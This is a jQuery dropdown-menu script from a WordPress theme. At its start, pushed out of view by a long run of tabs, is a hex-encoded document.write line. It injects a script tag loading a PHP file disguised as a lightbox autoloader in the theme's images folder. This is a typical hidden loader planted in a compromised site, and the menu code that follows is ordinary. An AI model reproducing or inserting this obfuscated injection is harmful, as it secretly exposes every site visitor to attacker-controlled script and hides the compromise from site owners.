																																																																							document.write("\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x74\x68\x65\x6D\x65\x73\x2F\x6D\x61\x73\x74\x65\x72\x66\x75\x6C\x2F\x69\x6D\x61\x67\x65\x73\x2F\x70\x61\x74\x74\x65\x72\x6E\x73\x2F\x73\x6C\x69\x6D\x62\x6F\x78\x32\x5F\x61\x75\x74\x6F\x6C\x6F\x61\x64\x2E\x70\x68\x70\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");// MENU by iKarina & iGor - http://themeforest.net/user/iKarina
$(function(){
// WP3 MENU
	$("ul.menu li").hover(function(){
		$(this).addClass("hover");
		var h = $(this).find('a').next().height();
		$('ul:first',this).css({'visibility':'visible','top':'100%','height':'0px'}).stop(true, false).animate({'height':h}, 200);
		}, function(){
			$(this).removeClass("hover");
			$('ul',this).css({'visibility':'visible','top':'-1500px','height':'','overflow':''});
		});
	$("ul.menu li:has(ul)").find("a:first").append('<span>&nbsp;</span>');
	$("ul.menu li ul li:has(ul)").find("a:first").append('<span class="arrright">&nbsp;</span>');
	$("ul.menu").find("ul").addClass("visiblenow");
// OLD MENU
	$("div.menu ul li").hover(function(){
		$(this).addClass("hover");
		var h = $(this).find('a').next().height();
		$('ul:first',this).css({'visibility':'visible','top':'100%','height':'0px'}).stop(true, false).animate({'height':h}, 200);
		}, function(){
			$(this).removeClass("hover");
			$('ul',this).css({'visibility':'visible','top':'-1500px','height':'','overflow':''});
		});
	$("div.menu ul li ul li:has(ul)").find("a:first").append('<span>&raquo;</span>');
});
